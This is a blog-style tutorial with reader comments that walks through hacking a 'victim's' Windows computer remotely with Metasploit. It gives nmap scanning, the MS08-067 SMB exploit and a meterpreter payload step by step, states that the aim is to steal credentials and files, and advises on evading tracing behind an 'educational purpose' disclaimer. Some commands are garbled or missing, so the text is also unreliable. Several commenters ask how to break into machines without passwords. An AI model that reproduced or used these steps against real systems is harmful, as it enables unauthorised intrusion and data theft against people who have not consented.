How to hack a computer remotely using metasploit

You have been hackedHey guys, today in this article I am going to talk about hacking a computer using metasploit. I think, I have already mentioned about metasploit in one of my article. Here I will give a general description on how it works and to use it efficiently to hack into a PC and steal credentials

But remember, this is only for educational purpose and hence damaging any victim’s computer is at your own risk.

Note: The hacker can be traceable and hence additional techniques are required to make yourself safe!

So here goes the requirements and the procedure to hack into a PC.


Introduction to attack:

Nmap is a port scanner used to scan a computer to locate the open ports. The ports are the path for the information that we need to steal. For a normal computer usually 30-40 ports are kept open.To find the number of ports open on your computer open command prompt (Start>Command prompt) and type netstat -ano and hit enter,  you will get a list of open ports in your computer. You need to have a basic knowledge on ports and port numbers to perform this attack.

Using a tool such as Metasploit we can spoof into the PC and steal the information from the corresponding port using commands. Learn to use Metasploit at

We use Linux because it is the best OS for hackers. And you must know to use terminal on Linux, since we perform this attack on command lines.


Step 1: At first we are going to port scan the computer. For this we need to open Nmap and type the following command.

nmap -sS -O

In the place ofip> you have to write the victims ip address. If you see the ports 139 and 445 open then you can go ahead.

Step 2: Now we have to open Metasploit (via terminal) and run it.

Type the following command to get the exploits in the victim’s computer.

show exploits

You will get a list of exploits in the victim’s computer. which looks similar to ms05_039_pnp. Every such exploit correspond to different function. We are interested in an exploit which looks like this ms08_067_netapi. So we give a command as shown below.

use windows/smb/ms08_067_netapi

Step 3: Now we use RHOST command to set the target ip.


And RPORT command to access port 445

set RPORT 445

Step 4: And now we give a command as


And then,

set TARGET 0

Step 5: Now we got to set the payload hence the following command.

set PAYLOAD windows/meterpreter/bind_tcp

Step 6: Time for the BIG BANG…! Type exploit and hit enter.

If you find the message which looks closer to “Meterpeter session 1 opened” then that implies you are done. You have successfully hacked  into the computer.

Now by using different commands we can steal the files on that system!

About these ads

21 thoughts on “How to hack a computer remotely using metasploit

  1. Hurrah, that’s what I was looking for, what a information! existing here at this webpage, thanks admin of this site.

  2. Nice post at How to hack a computer remotely using metasploit Basic Hacking Skills. I was checking continuously this blog and I am impressed! Very useful info particularly the last part :) I care for such info a lot. I was seeking this particular info for a long time. Thank you and good luck.

  3. We’re a gaggle of volunteers and starting a brand new scheme in our community. Your site offered us with helpful information to work on. You have performed an impressive activity and our whole community might be grateful to you.

  4. what different commands plz tell me

  5. Pingback: How to hack a computer remotely using metasploit « Bicol Geek

  6. How to hack a computer remotely using metasploit Basic Hacking Skills Discover to create himself, the write-up from an additional supply

  7. How to know suspense IP Address?

  8. after typing nmap -sS -O my metasploit doesnt show the ports 139 and 445 …pls send some help on my email.

  9. It was old school hacking art, now day’s it would not work any more.

  10. I’m often to blogging and i actually admire your content. The article has really peaks my interest. I am going to bookmark your website and maintain checking for new information.

  11. you have brought up a very good points , regards for the post.

  12. Wow that was odd. I just wrote an extremely long comment but after
    I clicked submit my comment didn’t appear. Grrrr… well I’m not writing all that over again.
    Anyway, just wanted to say fantastic blog!

  13. Pingback: Skill Dasar Hacking | Teuku Farhan

  14. Getting This Error.
    Exploit failed [no-target]: No matching target

  15. i have
    i have ip for the machine- linux red hat i want to hack i can connect with ssh but no password please what do i do?

  16. im far

    am far away from the other city and mt trainee technician has forgotten password
    i can connect to the win server machine through teamviewer and ssh through putty to the linux but buh!! i dont have password

  17. What’s up, all the time i used to check webpage posts here
    in the early hours in the morning, as i like to learn more and more.

Tell us what you think about this post

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s